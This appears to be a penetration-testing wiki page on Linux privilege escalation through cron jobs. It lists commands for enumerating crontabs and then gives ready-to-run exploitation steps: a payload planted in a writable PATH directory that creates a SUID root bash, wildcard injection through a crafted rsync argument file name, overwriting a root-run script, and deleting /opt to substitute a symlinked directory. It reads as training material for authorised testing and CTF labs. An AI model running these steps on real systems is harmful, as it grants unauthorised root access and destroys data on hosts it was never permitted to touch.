Cron Jobs

Theory

Cron is a job scheduler in Unix-based operating systems. Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. By default, Cron runs as root when executing /etc/crontab, so any commands or scripts that are called by the crontab will also run as root. It can be an intresting privelege escalation path.

Practice

Misc Cron Jobs

You may want to enumerate cron jobs with the following commands

#Print jobs with Crontab binary
crontab -l
crontab -l -u username

#Directly cat files
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

#From logs
cat /var/log/syslog | grep "CRON"

#In /etc/ and subfolders
cat /etc/crontab
cat /etc/cron*/*

# In /var/spool
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*

By using pspy, you can fetch processes without root privileges. It can be useful to detect cron jobs.

# -p: print commands to stdout
# -f: print file system events to stdout
# -i: interval in milliseconds
./pspy64 -pf -i 1000

It is also possible to monitor processes using the watch command. For example, we can grep on all occurrences of the word "pass". We may find clear-text credentials like that.

watch -n 1 "ps -ef | grep pass"

Cron Path

For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

We need to check if we have permissions to write on each path, if a the binary in the cron job is specified without the full command path, we may be able to exploit it.

$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    path-exploit.sh

We need to check if we have permission to write each path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Assume we can write an arbitrary binary file under /home/user, and its specified in the crontab PATH as in the example. We can create a payload in there.

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/path-exploit.sh
chmod +x /home/user/path-exploit.sh

Then wait for the job to execute.

# Run SUID Shell after exploit
/tmp/bash -p

Wildcard Injection

If a cron job script running as root contains an * inside a command, then you may be able to exploit it.

$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    rsync -a *.sh rsync://host.back/src/rbd

The exploit will depend of the binary. Using the previous example, we can use following commands to exploit it.

touch "-e sh myscript.sh"

echo '<PAYLOAD>' > myscript.sh

Read the following page for more wildcard exploitation tricks: HERE

File Overwriting and Symlink

If you can modify a cron job script executed by root, or it use a directory where you have full access, the we can exploit it.

$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    /opt/crons/overwrite.sh

If we have write permissions on the script, we can exploit by overwriting it:

#Check you have permissions
ls -la /opt/crons/overwrite.sh

#Overwrite
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /opt/crons/overwrite.sh

#Wait until it is executed
/tmp/bash -p

If we have full access over the directory, maybe it could be useful to delete that folder and create a symlink folder to another one serving a script controlled by you

#Check you have permissions
ls -la /

#Remove folder and create the symlink target
rm -rf /opt
mkdir /tmp/crons

#Create a new script
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /tmp/crons/overwrite.sh

#Create symlinl folder
ln -d -s /tmp/crons/ /opt/crons/

References

Linux Privilege EscalationHackTricks

TryHackMe | Linux PrivEsc ArenaTryHackMe

Last updated 1 year ago